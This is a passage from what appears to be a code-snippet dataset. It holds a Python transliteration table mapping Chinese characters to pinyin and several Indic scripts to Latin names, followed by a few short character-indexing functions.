u\"桑嗓丧\":\n self.trans[char] = u\"sang\"\n for char in u\"搔骚扫嫂\":\n self.trans[char] = u\"sao\"\n for char in u\"瑟色涩\":\n self.trans[char] = u\"se\"\n self.trans['森'] = 'sen'\n self.trans['僧'] = 'seng'\n for char in u\"莎砂杀刹沙纱傻啥煞\":\n self.trans[char] = u\"sha\"\n for char in u\"筛晒\":\n self.trans[char] = u\"shai\"\n for char in u\"珊苫杉山删煽衫闪陕擅赡膳善汕扇缮\":\n self.trans[char] = u\"shan\"\n for char in u\"墒伤商赏晌上尚裳\":\n self.trans[char] = u\"shang\"\n for char in u\"梢捎稍烧芍勺韶少哨邵绍\":\n self.trans[char] = u\"shao\"\n for char in u\"奢赊蛇舌舍赦摄射慑涉社设\":\n self.trans[char] = u\"she\"\n for char in u\"砷申呻伸身深娠绅神沈审婶甚肾慎渗\":\n self.trans[char] = u\"shen\"\n for char in u\"声生甥牲升绳省盛剩胜圣\":\n self.trans[char] = u\"sheng\"\n for char in u\"师失狮施湿诗尸虱十石拾时什食蚀实识史矢使屎驶始式示士世柿事拭誓逝势是嗜噬适仕侍释饰氏市恃室视试\":\n self.trans[char] = u\"shi\"\n for char in u\"收手首守寿授售受瘦兽\":\n self.trans[char] = u\"shou\"\n for char in u\"蔬枢梳殊抒输叔舒淑疏书赎孰熟薯暑曙署蜀黍鼠属术述树束戍竖墅庶数漱恕\":\n self.trans[char] = u\"shu\"\n for char in u\"刷耍\":\n self.trans[char] = 
u\"shua\"\n for char in u\"摔衰甩帅\":\n self.trans[char] = u\"shuai\"\n for char in u\"栓拴\":\n self.trans[char] = u\"shuan\"\n for char in u\"霜双爽\":\n self.trans[char] = u\"shuang\"\n for char in u\"谁水睡税\":\n self.trans[char] = u\"shui\"\n for char in u\"吮瞬顺舜\":\n self.trans[char] = u\"shun\"\n for char in u\"说硕朔烁\":\n self.trans[char] = u\"shuo\"\n for char in u\"斯撕嘶思私司丝死肆寺嗣四伺似饲巳\":\n self.trans[char] = u\"si\"\n for char in u\"松耸怂颂送宋讼诵\":\n self.trans[char] = u\"song\"\n for char in u\"搜艘擞\":\n self.trans[char] = u\"sou\"\n for char in u\"嗽苏酥俗素速粟僳塑溯宿诉肃\":\n self.trans[char] = u\"su\"\n for char in u\"酸蒜算\":\n self.trans[char] = u\"suan\"\n for char in u\"虽隋随绥髓碎岁穗遂隧祟\":\n self.trans[char] = u\"sui\"\n for char in u\"孙损笋\":\n self.trans[char] = u\"sun\"\n for char in u\"蓑梭唆缩琐索锁所\":\n self.trans[char] = u\"suo\"\n for char in u\"塌他它她塔獭挞蹋踏\":\n self.trans[char] = u\"ta\"\n for char in u\"胎苔抬台泰酞太态汰\":\n self.trans[char] = u\"tai\"\n for char in u\"坍摊贪瘫滩坛檀痰潭谭谈坦毯袒碳探叹炭\":\n self.trans[char] = u\"tan\"\n for char in u\"汤塘搪堂棠膛唐糖倘躺淌趟烫\":\n self.trans[char] = u\"tang\"\n for char in u\"掏涛滔绦萄桃逃淘陶讨套\":\n self.trans[char] = u\"tao\"\n self.trans['特'] = 'te'\n for char in u\"藤腾疼誊\":\n self.trans[char] = u\"teng\"\n for char in u\"梯剔踢锑提题蹄啼体替嚏惕涕剃屉\":\n self.trans[char] = u\"ti\"\n for char in u\"兲天添填田甜恬舔腆\":\n self.trans[char] = u\"tian\"\n for char in u\"挑条迢眺跳\":\n self.trans[char] = u\"tiao\"\n for char in u\"贴铁帖\":\n self.trans[char] = u\"tie\"\n for char in u\"厅听烃汀廷停亭庭挺艇\":\n self.trans[char] = u\"ting\"\n for char in u\"通桐酮瞳同铜彤童桶捅筒统痛\":\n self.trans[char] = u\"tong\"\n for char in u\"偷投头透\":\n self.trans[char] = u\"tou\"\n for char in u\"凸秃突图徒途涂屠土吐兔\":\n self.trans[char] = u\"tu\"\n for char in u\"湍团\":\n self.trans[char] = u\"tuan\"\n for char in u\"推颓腿蜕褪退\":\n self.trans[char] = u\"tui\"\n for char in u\"吞屯臀\":\n self.trans[char] = u\"tun\"\n for char in u\"拖托脱鸵陀驮驼椭妥拓唾\":\n self.trans[char] = u\"tuo\"\n for char in u\"挖哇蛙洼娃瓦袜\":\n self.trans[char] = u\"wa\"\n for char in u\"歪外\":\n self.trans[char] = u\"wai\"\n for char in u\"豌弯湾玩顽丸烷完碗挽晚皖惋宛婉万腕莞\":\n self.trans[char] = u\"wan\"\n for char in u\"汪王亡枉网往旺望忘妄\":\n self.trans[char] = u\"wang\"\n for char in u\"威巍微危韦违桅围唯惟为潍维苇萎委伟伪尾纬未蔚味畏胃喂魏位渭谓尉慰卫\":\n self.trans[char] = u\"wei\"\n for char in u\"瘟温蚊文闻纹吻稳紊问\":\n self.trans[char] = u\"wen\"\n for char in u\"嗡翁瓮\":\n self.trans[char] = u\"weng\"\n for char in u\"挝蜗涡窝我斡卧握沃\":\n self.trans[char] = u\"wo\"\n for char in u\"巫呜钨乌污诬屋无芜梧吾吴毋武五捂午舞伍侮坞戊雾晤物勿务悟误\":\n self.trans[char] = u\"wu\"\n for char in u\"昔熙析西硒矽晰嘻吸锡牺稀息希悉膝夕惜熄烯溪汐犀檄袭席习媳喜铣洗系隙戏细\":\n self.trans[char] = u\"xi\"\n for char in u\"瞎虾匣霞辖暇峡侠狭下厦夏吓\":\n self.trans[char] = u\"xia\"\n for char in u\"掀锨先仙鲜纤咸贤衔舷闲涎弦嫌显险现献县腺馅羡宪陷限线\":\n self.trans[char] = u\"xian\"\n for char in u\"相厢镶香箱襄湘乡翔祥详想响享项巷橡像向象\":\n self.trans[char] = u\"xiang\"\n for char in u\"萧硝霄削哮嚣销消宵淆晓小孝校肖啸笑效\":\n self.trans[char] = u\"xiao\"\n for char in u\"楔些歇蝎鞋协挟携邪斜胁谐写械卸蟹懈泄泻谢屑\":\n self.trans[char] = u\"xie\"\n for char in u\"薪芯锌欣辛新忻心信衅\":\n self.trans[char] = u\"xin\"\n for char in u\"星腥猩惺兴刑型形邢行醒幸杏性姓\":\n self.trans[char] = u\"xing\"\n for char in u\"兄凶胸匈汹雄熊\":\n self.trans[char] = u\"xiong\"\n for char in u\"休修羞朽嗅锈秀袖绣\":\n self.trans[char] = u\"xiu\"\n for char in u\"墟戌需虚嘘须徐许蓄酗叙旭序畜恤絮婿绪续\":\n self.trans[char] = u\"xu\"\n for char in u\"轩喧宣悬旋玄选癣眩绚\":\n self.trans[char] = u\"xuan\"\n for char in u\"靴薛学穴雪血\":\n self.trans[char] = u\"xue\"\n for char in u\"勋熏循旬询寻驯巡殉汛训讯逊迅\":\n self.trans[char] = u\"xun\"\n for char in u\"压押鸦鸭呀丫芽牙蚜崖衙涯雅哑亚讶\":\n self.trans[char] = u\"ya\"\n for char in 
u\"焉咽阉烟淹盐严研蜒岩延言颜阎炎沿奄掩眼衍演艳堰燕厌砚雁唁彦焰宴谚验\":\n self.trans[char] = u\"yan\"\n for char in u\"殃央鸯秧杨扬佯疡羊洋阳氧仰痒养样漾\":\n self.trans[char] = u\"yang\"\n for char in u\"邀腰妖瑶摇尧遥窑谣姚咬舀药要耀\":\n self.trans[char] = u\"yao\"\n for char in u\"椰噎耶爷野冶也页掖业叶曳腋夜液\":\n self.trans[char] = u\"ye\"\n for char in u\"一壹医揖铱依伊衣颐夷遗移仪胰疑沂宜姨彝椅蚁倚已乙矣以艺抑易邑屹亿役臆逸肄疫亦裔意毅忆义益溢诣议谊译异翼翌绎\":\n self.trans[char] = u\"yi\"\n for char in u\"茵荫因殷音阴姻吟银淫寅饮尹引隐印\":\n self.trans[char] = u\"yin\"\n for char in u\"英樱婴鹰应缨莹萤营荧蝇迎赢盈影颖硬映\":\n self.trans[char] = u\"ying\"\n self.trans['哟'] = 'yo'\n for char in u\"拥佣臃痈庸雍踊蛹咏泳涌永恿勇用\":\n self.trans[char] = u\"yong\"\n for char in u\"幽优悠忧尤由邮铀犹油游酉有友右佑釉诱又幼迂\":\n self.trans[char] = u\"you\"\n for char in u\"淤于盂榆虞愚舆余俞逾鱼愉渝渔隅予娱雨与屿禹宇语羽玉域芋郁吁遇喻峪御愈欲狱育誉浴寓裕预豫驭\":\n self.trans[char] = u\"yu\"\n for char in u\"鸳渊冤元垣袁原援辕园员圆猿源缘远苑愿怨院\":\n self.trans[char] = u\"yuan\"\n for char in u\"曰约越跃钥岳粤月悦阅\":\n self.trans[char] = u\"yue\"\n for char in u\"耘云郧匀陨允运蕴酝晕韵孕\":\n self.trans[char] = u\"yun\"\n for char in u\"匝砸杂\":\n self.trans[char] = u\"za\"\n for char in u\"栽哉灾宰载再在\":\n self.trans[char] = u\"zai\"\n for char in u\"咱攒暂赞\":\n self.trans[char] = u\"zan\"\n for char in u\"赃脏葬\":\n self.trans[char] = u\"zang\"\n for char in u\"遭糟凿藻枣早澡蚤躁噪造皂灶燥\":\n self.trans[char] = u\"zao\"\n for char in u\"责择则泽\":\n self.trans[char] = u\"ze\"\n self.trans['贼'] = 'zei'\n self.trans['怎'] = 'zen'\n for char in u\"增憎曾赠\":\n self.trans[char] = u\"zeng\"\n for char in u\"扎喳渣札轧铡闸眨栅榨咋乍炸诈\":\n self.trans[char] = u\"zha\"\n for char in u\"摘斋宅窄债寨\":\n self.trans[char] = u\"zhai\"\n for char in u\"瞻毡詹粘沾盏斩辗崭展蘸栈占战站湛绽\":\n self.trans[char] = u\"zhan\"\n for char in u\"樟章彰漳张掌涨杖丈帐账仗胀瘴障\":\n self.trans[char] = u\"zhang\"\n for char in u\"招昭找沼赵照罩兆肇召\":\n self.trans[char] = u\"zhao\"\n for char in u\"遮折哲蛰辙者锗蔗这浙\":\n self.trans[char] = u\"zhe\"\n for char in u\"珍斟真甄砧臻贞针侦枕疹诊震振镇阵圳\":\n self.trans[char] = u\"zhen\"\n for char in u\"蒸挣睁征狰争怔整拯正政帧症郑证\":\n self.trans[char] = u\"zheng\"\n for char in u\"芝枝支吱蜘知肢脂汁之织职直植殖执值侄址指止趾只旨纸志挚掷至致置帜峙制智秩稚质炙痔滞治窒\":\n self.trans[char] = u\"zhi\"\n for char in u\"中盅忠钟衷终种肿重仲众\":\n self.trans[char] = u\"zhong\"\n for char in u\"舟周州洲诌粥轴肘帚咒皱宙昼骤\":\n self.trans[char] = u\"zhou\"\n for char in u\"珠株蛛朱猪诸诛逐竹烛煮拄瞩嘱主著柱助蛀贮铸筑住注祝驻\":\n self.trans[char] = u\"zhu\"\n for char in u\"抓爪\":\n self.trans[char] = u\"zhua\"\n self.trans['拽'] = 'zhuai'\n for char in u\"专砖转撰赚篆\":\n self.trans[char] = u\"zhuan\"\n for char in u\"桩庄装妆撞壮状\":\n self.trans[char] = u\"zhuang\"\n for char in u\"椎锥追赘坠缀\":\n self.trans[char] = u\"zhui\"\n for char in u\"谆准\":\n self.trans[char] = u\"zhun\"\n for char in u\"捉拙卓桌琢茁酌啄着灼浊\":\n self.trans[char] = u\"zhuo\"\n for char in u\"兹咨资姿滋淄孜紫仔籽滓子自渍字\":\n self.trans[char] = u\"zi\"\n for char in u\"鬃棕踪宗综总纵\":\n self.trans[char] = u\"zong\"\n for char in u\"邹走奏揍\":\n self.trans[char] = u\"zou\"\n for char in u\"租足卒族祖诅阻组\":\n self.trans[char] = u\"zu\"\n for char in u\"钻纂\":\n self.trans[char] = u\"zuan\"\n for char in u\"嘴醉最罪\":\n self.trans[char] = u\"zui\"\n for char in u\"尊遵\":\n self.trans[char] = u\"zun\"\n for char in u\"昨左佐柞做作坐座\":\n self.trans[char] = u\"zuo\"\n # from: https://www.wikidata.org/wiki/MediaWiki:Gadget-SimpleTransliterate.js\n self.trans[u\"ଂ\"] = \"anusvara\"\n self.trans[u\"ઇ\"] = \"i\"\n self.trans[u\"എ\"] = \"e\"\n self.trans[u\"ગ\"] = \"ga\"\n self.trans[u\"ਜ\"] = \"ja\"\n self.trans[u\"ഞ\"] = \"nya\"\n self.trans[u\"ଢ\"] = \"ddha\"\n self.trans[u\"ધ\"] = \"dha\"\n self.trans[u\"ਬ\"] = \"ba\"\n self.trans[u\"മ\"] = \"ma\"\n self.trans[u\"ଲ\"] = \"la\"\n self.trans[u\"ષ\"] = \"ssa\"\n self.trans[u\"਼\"] = \"nukta\"\n 
self.trans[u\"ാ\"] = \"aa\"\n self.trans[u\"ୂ\"] = \"uu\"\n self.trans[u\"ે\"] = \"e\"\n self.trans[u\"ੌ\"] = \"au\"\n self.trans[u\"ൎ\"] = \"reph\"\n self.trans[u\"ੜ\"] = \"rra\"\n self.trans[u\"՞\"] = \"?\"\n self.trans[u\"ୢ\"] = \"l\"\n self.trans[u\"૧\"] = \"1\"\n self.trans[u\"੬\"] = \"6\"\n self.trans[u\"൮\"] = \"8\"\n self.trans[u\"୲\"] = \"quarter\"\n self.trans[u\"ൾ\"] = \"ll\"\n self.trans[u\"ਇ\"] = \"i\"\n self.trans[u\"ഉ\"] = \"u\"\n self.trans[u\"ઌ\"] = \"l\"\n self.trans[u\"ਗ\"] = \"ga\"\n self.trans[u\"ങ\"] = \"nga\"\n self.trans[u\"ଝ\"] = \"jha\"\n self.trans[u\"જ\"] = \"ja\"\n self.trans[u\"؟\"] = \"?\"\n self.trans[u\"ਧ\"] = \"dha\"\n self.trans[u\"ഩ\"] = \"nnna\"\n self.trans[u\"ଭ\"] = \"bha\"\n self.trans[u\"બ\"] = \"ba\"\n self.trans[u\"ഹ\"] = \"ha\"\n self.trans[u\"ଽ\"] = \"avagraha\"\n self.trans[u\"઼\"] = \"nukta\"\n self.trans[u\"ੇ\"] = \"ee\"\n self.trans[u\"୍\"] = \"virama\"\n self.trans[u\"ૌ\"] = \"au\"\n self.trans[u\"੧\"] = \"1\"\n self.trans[u\"൩\"] = \"3\"\n self.trans[u\"୭\"] = \"7\"\n self.trans[u\"૬\"] = \"6\"\n self.trans[u\"൹\"] = \"mark\"\n self.trans[u\"ਖ਼\"] = \"khha\"\n self.trans[u\"ਂ\"] = \"bindi\"\n self.trans[u\"ഈ\"] = \"ii\"\n self.trans[u\"ઍ\"] = \"e\"\n self.trans[u\"ଌ\"] = \"l\"\n self.trans[u\"ഘ\"] = \"gha\"\n self.trans[u\"ઝ\"] = \"jha\"\n self.trans[u\"ଡ଼\"] = \"rra\"\n self.trans[u\"ਢ\"] = \"ddha\"\n self.trans[u\"ന\"] = \"na\"\n self.trans[u\"ભ\"] = \"bha\"\n self.trans[u\"ବ\"] = \"ba\"\n self.trans[u\"ਲ\"] = \"la\"\n self.trans[u\"സ\"] = \"sa\"\n self.trans[u\"ઽ\"] = \"avagraha\"\n self.trans[u\"଼\"] = \"nukta\"\n self.trans[u\"ੂ\"] = \"uu\"\n self.trans[u\"ൈ\"] = \"ai\"\n self.trans[u\"્\"] = \"virama\"\n self.trans[u\"ୌ\"] = \"au\"\n self.trans[u\"൨\"] = \"2\"\n self.trans[u\"૭\"] = \"7\"\n self.trans[u\"୬\"] = \"6\"\n self.trans[u\"ੲ\"] = \"iri\"\n self.trans[u\"ഃ\"] = \"visarga\"\n self.trans[u\"ં\"] = \"anusvara\"\n self.trans[u\"ଇ\"] = \"i\"\n self.trans[u\"ഓ\"] = \"oo\"\n self.trans[u\"ଗ\"] = \"ga\"\n self.trans[u\"ਝ\"] = \"jha\"\n self.trans[u\"?\"] = \"?\"\n self.trans[u\"ണ\"] = \"nna\"\n self.trans[u\"ઢ\"] = \"ddha\"\n self.trans[u\"ଧ\"] = \"dha\"\n self.trans[u\"ਭ\"] = \"bha\"\n self.trans[u\"ള\"] = \"lla\"\n self.trans[u\"લ\"] = \"la\"\n self.trans[u\"ଷ\"] = \"ssa\"\n self.trans[u\"ൃ\"] = \"r\"\n self.trans[u\"ૂ\"] = \"uu\"\n self.trans[u\"େ\"] = \"e\"\n self.trans[u\"੍\"] = \"virama\"\n self.trans[u\"ୗ\"] = \"mark\"\n self.trans[u\"ൣ\"] = \"ll\"\n self.trans[u\"ૢ\"] = \"l\"\n self.trans[u\"୧\"] = \"1\"\n self.trans[u\"੭\"] = \"7\"\n self.trans[u\"൳\"] = \"1/4\"\n self.trans[u\"୷\"] = \"sixteenths\"\n self.trans[u\"ଆ\"] = \"aa\"\n self.trans[u\"ઋ\"] = \"r\"\n self.trans[u\"ഊ\"] = \"uu\"\n self.trans[u\"ਐ\"] = \"ai\"\n self.trans[u\"ଖ\"] = \"kha\"\n self.trans[u\"છ\"] = \"cha\"\n self.trans[u\"ച\"] = \"ca\"\n self.trans[u\"ਠ\"] = \"ttha\"\n self.trans[u\"ଦ\"] = \"da\"\n self.trans[u\"ફ\"] = \"pha\"\n self.trans[u\"പ\"] = \"pa\"\n self.trans[u\"ਰ\"] = \"ra\"\n self.trans[u\"ଶ\"] = \"sha\"\n self.trans[u\"ഺ\"] = \"ttta\"\n self.trans[u\"ੀ\"] = \"ii\"\n self.trans[u\"ો\"] = \"o\"\n self.trans[u\"ൊ\"] = \"o\"\n self.trans[u\"ୖ\"] = \"mark\"\n self.trans[u\"୦\"] = \"0\"\n self.trans[u\"૫\"] = \"5\"\n self.trans[u\"൪\"] = \"4\"\n self.trans[u\"ੰ\"] = \"tippi\"\n self.trans[u\"୶\"] = \"eighth\"\n self.trans[u\"ൺ\"] = \"nn\"\n self.trans[u\"ଁ\"] = \"candrabindu\"\n self.trans[u\"അ\"] = \"a\"\n self.trans[u\"ઐ\"] = \"ai\"\n self.trans[u\"ക\"] = \"ka\"\n self.trans[u\"ਸ਼\"] = \"sha\"\n self.trans[u\"ਛ\"] = \"cha\"\n self.trans[u\"ଡ\"] 
= \"dda\"\n self.trans[u\"ઠ\"] = \"ttha\"\n self.trans[u\"ഥ\"] = \"tha\"\n self.trans[u\"ਫ\"] = \"pha\"\n self.trans[u\"ર\"] = \"ra\"\n self.trans[u\"വ\"] = \"va\"\n self.trans[u\"ୁ\"] = \"u\"\n self.trans[u\"ી\"] = \"ii\"\n self.trans[u\"ੋ\"] = \"oo\"\n self.trans[u\"ૐ\"] = \"om\"\n self.trans[u\"ୡ\"] = \"ll\"\n self.trans[u\"ૠ\"] = \"rr\"\n self.trans[u\"੫\"] = \"5\"\n self.trans[u\"ୱ\"] = \"wa\"\n self.trans[u\"૰\"] = \"sign\"\n self.trans[u\"൵\"] = \"quarters\"\n self.trans[u\"ਫ਼\"] = \"fa\"\n self.trans[u\"ઁ\"] = \"candrabindu\"\n self.trans[u\"ਆ\"] = \"aa\"\n self.trans[u\"ઑ\"] = \"o\"\n self.trans[u\"ଐ\"] = \"ai\"\n self.trans[u\"ഔ\"] = \"au\"\n self.trans[u\"ਖ\"] = \"kha\"\n self.trans[u\"ડ\"] = \"dda\"\n self.trans[u\"ଠ\"] = \"ttha\"\n self.trans[u\"ത\"] = \"ta\"\n self.trans[u\"ਦ\"] = \"da\"\n self.trans[u\"ର\"] = \"ra\"\n self.trans[u\"ഴ\"] = \"llla\"\n self.trans[u\"ુ\"] = \"u\"\n self.trans[u\"ୀ\"] = \"ii\"\n self.trans[u\"ൄ\"] = \"rr\"\n self.trans[u\"ૡ\"] = \"ll\"\n self.trans[u\"ୠ\"] = \"rr\"\n self.trans[u\"੦\"] = \"0\"\n self.trans[u\"૱\"] = \"sign\"\n self.trans[u\"୰\"] = \"isshar\"\n self.trans[u\"൴\"] = \"1/2\"\n self.trans[u\"ਁ\"] = \"bindi\"\n self.trans[u\"આ\"] = \"aa\"\n self.trans[u\"ଋ\"] = \"r\"\n self.trans[u\"ഏ\"] = \"ee\"\n self.trans[u\"ખ\"] = \"kha\"\n self.trans[u\"ଛ\"] = \"cha\"\n self.trans[u\"ട\"] = \"tta\"\n self.trans[u\"ਡ\"] = \"dda\"\n self.trans[u\"દ\"] = \"da\"\n self.trans[u\"ଫ\"] = \"pha\"\n self.trans[u\"യ\"] = \"ya\"\n self.trans[u\"શ\"] = \"sha\"\n self.trans[u\"ി\"] = \"i\"\n self.trans[u\"ੁ\"] = \"u\"\n self.trans[u\"ୋ\"] = \"o\"\n self.trans[u\"ੑ\"] = \"udaat\"\n self.trans[u\"૦\"] = \"0\"\n self.trans[u\"୫\"] = \"5\"\n self.trans[u\"൯\"] = \"9\"\n self.trans[u\"ੱ\"] = \"addak\"\n self.trans[u\"ൿ\"] = \"k\"\n self.trans[u\"ആ\"] = \"aa\"\n self.trans[u\"ଊ\"] = \"uu\"\n self.trans[u\"એ\"] = \"e\"\n self.trans[u\"ਔ\"] = \"au\"\n self.trans[u\"ഖ\"] = \"kha\"\n self.trans[u\"ଚ\"] = \"ca\"\n self.trans[u\"ટ\"] = \"tta\"\n self.trans[u\"ਤ\"] = \"ta\"\n self.trans[u\"ദ\"] = \"da\"\n self.trans[u\"ପ\"] = \"pa\"\n self.trans[u\"ય\"] = \"ya\"\n self.trans[u\"ശ\"] = \"sha\"\n self.trans[u\"િ\"] = \"i\"\n self.trans[u\"െ\"] = \"e\"\n self.trans[u\"൦\"] = \"0\"\n self.trans[u\"୪\"] = \"4\"\n self.trans[u\"૯\"] = \"9\"\n self.trans[u\"ੴ\"] = \"onkar\"\n self.trans[u\"ଅ\"] = \"a\"\n self.trans[u\"ਏ\"] = \"ee\"\n self.trans[u\"କ\"] = \"ka\"\n self.trans[u\"ઔ\"] = \"au\"\n self.trans[u\"ਟ\"] = \"tta\"\n self.trans[u\"ഡ\"] = \"dda\"\n self.trans[u\"ଥ\"] = \"tha\"\n self.trans[u\"ત\"] = \"ta\"\n self.trans[u\"ਯ\"] = \"ya\"\n self.trans[u\"റ\"] = \"rra\"\n self.trans[u\"ଵ\"] = \"va\"\n self.trans[u\"ਿ\"] = \"i\"\n self.trans[u\"ു\"] = \"u\"\n self.trans[u\"ૄ\"] = \"rr\"\n self.trans[u\"ൡ\"] = \"ll\"\n self.trans[u\"੯\"] = \"9\"\n self.trans[u\"൱\"] = \"100\"\n self.trans[u\"୵\"] = \"sixteenth\"\n self.trans[u\"અ\"] = \"a\"\n self.trans[u\"ਊ\"] = \"uu\"\n self.trans[u\"ഐ\"] = \"ai\"\n self.trans[u\"ક\"] = \"ka\"\n self.trans[u\"ଔ\"] = \"au\"\n self.trans[u\"ਚ\"] = \"ca\"\n self.trans[u\"ഠ\"] = \"ttha\"\n self.trans[u\"થ\"] = \"tha\"\n self.trans[u\"ତ\"] = \"ta\"\n self.trans[u\"ਪ\"] = \"pa\"\n self.trans[u\"ര\"] = \"ra\"\n self.trans[u\"વ\"] = \"va\"\n self.trans[u\"ീ\"] = \"ii\"\n self.trans[u\"ૅ\"] = \"e\"\n self.trans[u\"ୄ\"] = \"rr\"\n self.trans[u\"ൠ\"] = \"rr\"\n self.trans[u\"ਜ਼\"] = \"za\"\n self.trans[u\"੪\"] = \"4\"\n self.trans[u\"൰\"] = \"10\"\n self.trans[u\"୴\"] = \"quarters\"\n self.trans[u\"ਅ\"] = \"a\"\n self.trans[u\"ഋ\"] = \"r\"\n 
self.trans[u\"ઊ\"] = \"uu\"\n self.trans[u\"ଏ\"] = \"e\"\n self.trans[u\"ਕ\"] = \"ka\"\n self.trans[u\"ഛ\"] = \"cha\"\n self.trans[u\"ચ\"] = \"ca\"\n self.trans[u\"ଟ\"] = \"tta\"\n self.trans[u\"ਥ\"] = \"tha\"\n self.trans[u\"ഫ\"] = \"pha\"\n self.trans[u\"પ\"] = \"pa\"\n self.trans[u\"ଯ\"] = \"ya\"\n self.trans[u\"ਵ\"] = \"va\"\n self.trans[u\"ି\"] = \"i\"\n self.trans[u\"ോ\"] = \"oo\"\n self.trans[u\"ୟ\"] = \"yya\"\n self.trans[u\"൫\"] = \"5\"\n self.trans[u\"૪\"] = \"4\"\n self.trans[u\"୯\"] = \"9\"\n self.trans[u\"ੵ\"] = \"yakash\"\n self.trans[u\"ൻ\"] = \"n\"\n self.trans[u\"ઃ\"] = \"visarga\"\n self.trans[u\"ം\"] = \"anusvara\"\n self.trans[u\"ਈ\"] = \"ii\"\n self.trans[u\"ઓ\"] = \"o\"\n self.trans[u\"ഒ\"] = \"o\"\n self.trans[u\"ਘ\"] = \"gha\"\n self.trans[u\"ଞ\"] = \"nya\"\n self.trans[u\"ણ\"] = \"nna\"\n self.trans[u\"ഢ\"] = \"ddha\"\n self.trans[u\"ਲ਼\"] = \"lla\"\n self.trans[u\"ਨ\"] = \"na\"\n self.trans[u\"ମ\"] = \"ma\"\n self.trans[u\"ળ\"] = \"lla\"\n self.trans[u\"ല\"] = \"la\"\n self.trans[u\"ਸ\"] = \"sa\"\n self.trans[u\"¿\"] = \"?\"\n self.trans[u\"ା\"] = \"aa\"\n self.trans[u\"ૃ\"] = \"r\"\n self.trans[u\"ൂ\"] = \"uu\"\n self.trans[u\"ੈ\"] = \"ai\"\n self.trans[u\"ૣ\"] = \"ll\"\n self.trans[u\"ൢ\"] = \"l\"\n self.trans[u\"੨\"] = \"2\"\n self.trans[u\"୮\"] = \"8\"\n self.trans[u\"൲\"] = \"1000\"\n self.trans[u\"ਃ\"] = \"visarga\"\n self.trans[u\"ଉ\"] = \"u\"\n self.trans[u\"ઈ\"] = \"ii\"\n self.trans[u\"ਓ\"] = \"oo\"\n self.trans[u\"ଙ\"] = \"nga\"\n self.trans[u\"ઘ\"] = \"gha\"\n self.trans[u\"ഝ\"] = \"jha\"\n self.trans[u\"ਣ\"] = \"nna\"\n self.trans[u\"ન\"] = \"na\"\n self.trans[u\"ഭ\"] = \"bha\"\n self.trans[u\"ଜ\"] = \"ja\"\n self.trans[u\"ହ\"] = \"ha\"\n self.trans[u\"સ\"] = \"sa\"\n self.trans[u\"ഽ\"] = \"avagraha\"\n self.trans[u\"ૈ\"] = \"ai\"\n self.trans[u\"്\"] = \"virama\"\n self.trans[u\"୩\"] = \"3\"\n self.trans[u\"૨\"] = \"2\"\n self.trans[u\"൭\"] = \"7\"\n self.trans[u\"ੳ\"] = \"ura\"\n self.trans[u\"ൽ\"] = \"l\"\n self.trans[u\"ઉ\"] = \"u\"\n self.trans[u\"ଈ\"] = \"ii\"\n self.trans[u\"ഌ\"] = \"l\"\n self.trans[u\"ઙ\"] = \"nga\"\n self.trans[u\"ଘ\"] = \"gha\"\n self.trans[u\"ജ\"] = \"ja\"\n self.trans[u\"ਞ\"] = \"nya\"\n self.trans[u\"ନ\"] = \"na\"\n self.trans[u\"ബ\"] = \"ba\"\n self.trans[u\"ਮ\"] = \"ma\"\n self.trans[u\"હ\"] = \"ha\"\n self.trans[u\"ସ\"] = \"sa\"\n self.trans[u\"ਾ\"] = \"aa\"\n self.trans[u\"ૉ\"] = \"o\"\n self.trans[u\"ୈ\"] = \"ai\"\n self.trans[u\"ൌ\"] = \"au\"\n self.trans[u\"૩\"] = \"3\"\n self.trans[u\"୨\"] = \"2\"\n self.trans[u\"൬\"] = \"6\"\n self.trans[u\"੮\"] = \"8\"\n self.trans[u\"ർ\"] = \"rr\"\n self.trans[u\"ଃ\"] = \"visarga\"\n self.trans[u\"ഇ\"] = \"i\"\n self.trans[u\"ਉ\"] = \"u\"\n self.trans[u\"ଓ\"] = \"o\"\n self.trans[u\"ഗ\"] = \"ga\"\n self.trans[u\"ਙ\"] = \"nga\"\n self.trans[u\"ઞ\"] = \"nya\"\n self.trans[u\"ଣ\"] = \"nna\"\n self.trans[u\"ധ\"] = \"dha\"\n self.trans[u\"મ\"] = \"ma\"\n self.trans[u\"ଳ\"] = \"lla\"\n self.trans[u\"ഷ\"] = \"ssa\"\n self.trans[u\"ਹ\"] = \"ha\"\n self.trans[u\"ਗ਼\"] = \"ghha\"\n self.trans[u\"ા\"] = \"aa\"\n self.trans[u\"ୃ\"] = \"r\"\n self.trans[u\"േ\"] = \"ee\"\n self.trans[u\"ൗ\"] = \"mark\"\n self.trans[u\"ଢ଼\"] = \"rha\"\n self.trans[u\"ୣ\"] = \"ll\"\n self.trans[u\"൧\"] = \"1\"\n self.trans[u\"੩\"] = \"3\"\n self.trans[u\"૮\"] = \"8\"\n self.trans[u\"୳\"] = \"half\"\n for char in self.trans:\n value = self.trans[char]\n if value == \"?\":\n continue\n while value.encode(encoding, 'replace').decode(encoding) == \"?\" and value in self.trans:\n assert value != self.trans[value], 
\"%r == self.trans[%r]!\" % (value, value)\n value = self.trans[value]\n self.trans[char] = value", "def __init__(self, chars):\n self.chars = sorted(set(chars))\n self.char_indices = dict((c, i) for i, c in enumerate(self.chars))\n self.indices_char = dict((i, c) for i, c in enumerate(self.chars))", "def init_letters():\n return ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',\n 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',\n 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I',\n 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R',\n 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z')", "def getCharMapping(tweets):\n text = map(lambda x: x.getText(), tweets)\n allChars = [c for s in text for c in s]\n x = collections.Counter(allChars)\n chars_used = x.most_common()[:max_chars]\n charset = map(lambda x: x[0], chars_used)\n # Add padding, start, end and unknown characters\n mapping = dict((c, i) for i, c in enumerate(charset + ['<s>', '</s>', '<pad>', '<unknown>', '<unknown_test>']))\n dump(mapping, open(char_mapping_filename, 'wb'))\n return mapping", "def __init__(self, chars):\n self.chars = sorted(set(chars))\n self.char_indices = dict((c, i) for i, c in enumerate(self.chars))\n self.indices_char = dict((i, c) for i, c in enumerate(self.chars))", "def __init__(self, chars):\n self.chars = sorted(set(chars))\n self.char_indices = dict((c, i) for i, c in enumerate(self.chars))\n self.indices_char = dict((i, c) for i, c in enumerate(self.chars))", "def _generate_character_map(self):\n self._ct = [-1] * 256\n index = 0\n for c_range in self._meta.character_ranges:\n for c_pos in range(c_range['min'], c_range['max'] + 1):\n self._ct[c_pos] = index\n index += 1", "def 